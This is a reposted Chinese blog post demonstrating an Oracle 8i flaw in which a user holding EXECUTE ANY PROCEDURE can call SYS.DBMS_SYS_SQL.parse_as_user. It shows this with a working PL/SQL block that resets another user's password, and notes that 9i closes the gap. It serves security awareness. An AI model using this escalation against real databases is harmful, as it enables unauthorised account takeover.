今天察看7445的错发现一贴子,记录如下:
TOM曾经多次说过:
All I need is "CREATE SESSION" and "EXECUTE ANY PROCEDURE" and I can totally do anything I want to in your database.
那么这个EXECUTE ANY PROCEDURE的危险来自哪里呢?
让我们通过一个例子来认识这个危险.
1.创建测试用户
让我们通过一个例子来认识这个危险.
1.创建测试用户
$ sqlplus "/ as sysdba" SQL*Plus: Release 8.1.7.0.0 - Production on Tue May 10 09:57:41 2005 (c) Copyright 2000 Oracle Corporation. All rights reserved. Connected to: Oracle8i Enterprise Edition Release 8.1.7.4.0 - 64bit Production With the Partitioning option JServer Release 8.1.7.4.0 - 64bit Production SQL> create user hacker identified by hacker default tablespace users temporary 2 tablespace temp; User created. SQL> grant create session to hacker; Grant succeeded. SQL> grant execute any procedure to hacker; Grant succeeded. SQL> create user loser identified by loser default tablespace users temporary 2 tablespace temp; User created. SQL> grant connect to loser; Grant succeeded. |
2.使用测试用户连接
注意,此时用户hacker具有了访问和执行dbms_sys_sql包的权限。
SQL> connect hacker/hacker Connected. SQL> desc sys.dbms_sys_sql PROCEDURE BIND_ARRAY Argument Name Type In/Out Default? ------------------------------ ----------------------- ------ -------- C NUMBER(38) IN NAME VARCHAR2 IN N_TAB TABLE OF NUMBER IN PROCEDURE BIND_ARRAY Argument Name Type In/Out Default? ------------------------------ ----------------------- ------ -------- C NUMBER(38) IN NAME VARCHAR2 IN C_TAB TABLE OF VARCHAR2(2000) IN .... PROCEDURE VARIABLE_VALUE_ROWID Argument Name Type In/Out Default? ------------------------------ ----------------------- ------ -------- C NUMBER(38) IN NAME VARCHAR2 IN VALUE ROWID OUT |
3.这意味着什么?
SQL> connect hacker/hacker Connected. SQL> DECLARE 2 UID NUMBER; 3 sqltext VARCHAR2 (100) := 'alter user loser identified by test'; 4 c INTEGER; 5 BEGIN 6 c := SYS.DBMS_SYS_SQL.open_cursor (); 7 SYS.DBMS_SYS_SQL.parse_as_user (c, sqltext, DBMS_SQL.native, 0); 8 SYS.DBMS_SYS_SQL.close_cursor (c); 9 END; 10 / PL/SQL procedure successfully completed. |
通过DBMS_SYS_SQL.parse_as_user,hacker可以在数据库内任意为非作歹了。
用户loser的口令已被更改:
SQL> connect loser/loser ERROR: ORA-01017: invalid username/password; logon denied Warning: You are no longer connected to ORACLE. SQL> connect loser/test Connected. SQL> |
4.注意版本
实际上这个bug只存在于Oracle8i中,从Oracle9i开始,即使拥有了execute any procedure的权限也不足以访问DBMS_SYS_SQL.
SQL> grant execute any procedure to test; Grant succeeded. Elapsed: 00:00:00.33 SQL> connect test/test Connected. SQL> desc dbms_sys_sql ERROR: ORA-04043: object dbms_sys_sql does not exist SQL> desc sys.dbms_sys_sql ERROR: ORA-04043: object sys.dbms_sys_sql does not exist SQL> select * from v$version; BANNER ---------------------------------------------------------------- Oracle9i Enterprise Edition Release 9.2.0.4.0 - Production PL/SQL Release 9.2.0.4.0 - Production CORE 9.2.0.3.0 Production TNS for Linux: Version 9.2.0.4.0 - Production NLSRTL Version 9.2.0.4.0 - Production Elapsed: 00:00:00.32 |
Oracle的世界也正在变得更加安全。
其中心意思是有了两种权限,就能访问和执行dbms_sys_sql包的权限。所幸的是9i之后这个漏洞就没了,学无止境!
来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/7177735/viewspace-705118/,如需转载,请注明出处,否则将追究法律责任。
转载于:http://blog.itpub.net/7177735/viewspace-705118/